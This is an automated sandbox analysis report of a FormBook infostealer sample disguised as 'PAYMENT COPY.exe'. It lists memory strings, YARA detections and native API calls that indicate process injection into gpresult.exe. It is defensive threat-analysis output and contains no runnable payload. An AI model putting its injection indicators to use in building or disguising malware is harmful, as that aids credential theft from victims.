Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4949275030.0000000005DA2000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000035D2000.00000004.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003C1A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew/domain/pinpointopia.com?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=expired
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/support/#request
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.topscaleservices.com
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PAYMENT COPY.exe

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0042B933 NtClose,	9_2_0042B933
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040AC8E NtDelayExecution,	9_2_0040AC8E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502B60 NtClose,LdrInitializeThunk,	9_2_01502B60
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01502DF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01502C70
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015035C0 NtCreateMutant,LdrInitializeThunk,	9_2_015035C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01504340 NtSetContextThread,	9_2_01504340
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01504650 NtSuspendThread,	9_2_01504650
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502BF0 NtAllocateVirtualMemory,	9_2_01502BF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502BE0 NtQueryValueKey,	9_2_01502BE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502B80 NtQueryInformationFile,	9_2_01502B80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502BA0 NtEnumerateValueKey,	9_2_01502BA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502AD0 NtReadFile,	9_2_01502AD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502AF0 NtWriteFile,	9_2_01502AF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502AB0 NtWaitForSingleObject,	9_2_01502AB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502D10 NtMapViewOfSection,	9_2_01502D10
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502D00 NtSetInformationFile,	9_2_01502D00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502D30 NtUnmapViewOfSection,	9_2_01502D30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502DD0 NtDelayExecution,	9_2_01502DD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502DB0 NtEnumerateKey,	9_2_01502DB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502C60 NtCreateKey,	9_2_01502C60
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502C00 NtQueryInformationProcess,	9_2_01502C00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502CC0 NtQueryVirtualMemory,	9_2_01502CC0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502CF0 NtOpenProcess,	9_2_01502CF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502CA0 NtQueryInformationToken,	9_2_01502CA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502F60 NtCreateProcessEx,	9_2_01502F60
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502F30 NtCreateSection,	9_2_01502F30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502FE0 NtCreateFile,	9_2_01502FE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502F90 NtProtectVirtualMemory,	9_2_01502F90
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502FB0 NtResumeThread,	9_2_01502FB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502FA0 NtQuerySection,	9_2_01502FA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502E30 NtWriteVirtualMemory,	9_2_01502E30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502EE0 NtQueueApcThread,	9_2_01502EE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502E80 NtReadVirtualMemory,	9_2_01502E80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502EA0 NtAdjustPrivilegesToken,	9_2_01502EA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503010 NtOpenDirectoryObject,	9_2_01503010
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503090 NtSetValueKey,	9_2_01503090
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015039B0 NtGetContextThread,	9_2_015039B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503D70 NtOpenThread,	9_2_01503D70
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503D10 NtOpenProcessToken,	9_2_01503D10
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04904650 NtSuspendThread,LdrInitializeThunk,	13_2_04904650
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04904340 NtSetContextThread,LdrInitializeThunk,	13_2_04904340
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_04902CA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_04902C70
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902C60 NtCreateKey,LdrInitializeThunk,	13_2_04902C60
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902DD0 NtDelayExecution,LdrInitializeThunk,	13_2_04902DD0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_04902DF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_04902D10
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_04902D30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_04902E80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902EE0 NtQueueApcThread,LdrInitializeThunk,	13_2_04902EE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902FB0 NtResumeThread,LdrInitializeThunk,	13_2_04902FB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902FE0 NtCreateFile,LdrInitializeThunk,	13_2_04902FE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902F30 NtCreateSection,LdrInitializeThunk,	13_2_04902F30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902AD0 NtReadFile,LdrInitializeThunk,	13_2_04902AD0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902AF0 NtWriteFile,LdrInitializeThunk,	13_2_04902AF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902BA0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_04902BA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_04902BF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_04902BE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902B60 NtClose,LdrInitializeThunk,	13_2_04902B60
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049035C0 NtCreateMutant,LdrInitializeThunk,	13_2_049035C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049039B0 NtGetContextThread,LdrInitializeThunk,	13_2_049039B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902CC0 NtQueryVirtualMemory,	13_2_04902CC0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902CF0 NtOpenProcess,	13_2_04902CF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902C00 NtQueryInformationProcess,	13_2_04902C00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902DB0 NtEnumerateKey,	13_2_04902DB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902D00 NtSetInformationFile,	13_2_04902D00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902EA0 NtAdjustPrivilegesToken,	13_2_04902EA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902E30 NtWriteVirtualMemory,	13_2_04902E30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902F90 NtProtectVirtualMemory,	13_2_04902F90
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902FA0 NtQuerySection,	13_2_04902FA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902F60 NtCreateProcessEx,	13_2_04902F60
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902AB0 NtWaitForSingleObject,	13_2_04902AB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902B80 NtQueryInformationFile,	13_2_04902B80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903090 NtSetValueKey,	13_2_04903090
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903010 NtOpenDirectoryObject,	13_2_04903010
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903D10 NtOpenProcessToken,	13_2_04903D10
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903D70 NtOpenThread,	13_2_04903D70
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_008880C0 NtClose,	13_2_008880C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00888030 NtDeleteFile,	13_2_00888030
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00888210 NtAllocateVirtualMemory,	13_2_00888210
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00887DF0 NtCreateFile,	13_2_00887DF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00887F50 NtReadFile,	13_2_00887F50

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_0111D4FC	0_2_0111D4FC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB4EC8	0_2_06DB4EC8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB6F9B	0_2_06DB6F9B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB2F91	0_2_06DB2F91
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB2FB0	0_2_06DB2FB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB33E8	0_2_06DB33E8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB5878	0_2_06DB5878
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB3820	0_2_06DB3820
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DBC1B0	0_2_06DBC1B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00410873	9_2_00410873
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040282B	9_2_0040282B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00402830	9_2_00402830
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040E8F3	9_2_0040E8F3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00401D40	9_2_00401D40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0042DD63	9_2_0042DD63
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00401D3B	9_2_00401D3B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004035F0	9_2_004035F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0041064A	9_2_0041064A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00410653	9_2_00410653
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00416F63	9_2_00416F63
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01558158	9_2_01558158
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0100	9_2_014C0100
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156A118	9_2_0156A118
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015881CC	9_2_015881CC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015901AA	9_2_015901AA
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015841A2	9_2_015841A2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158A352	9_2_0158A352
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE3F0	9_2_014DE3F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015903E6	9_2_015903E6
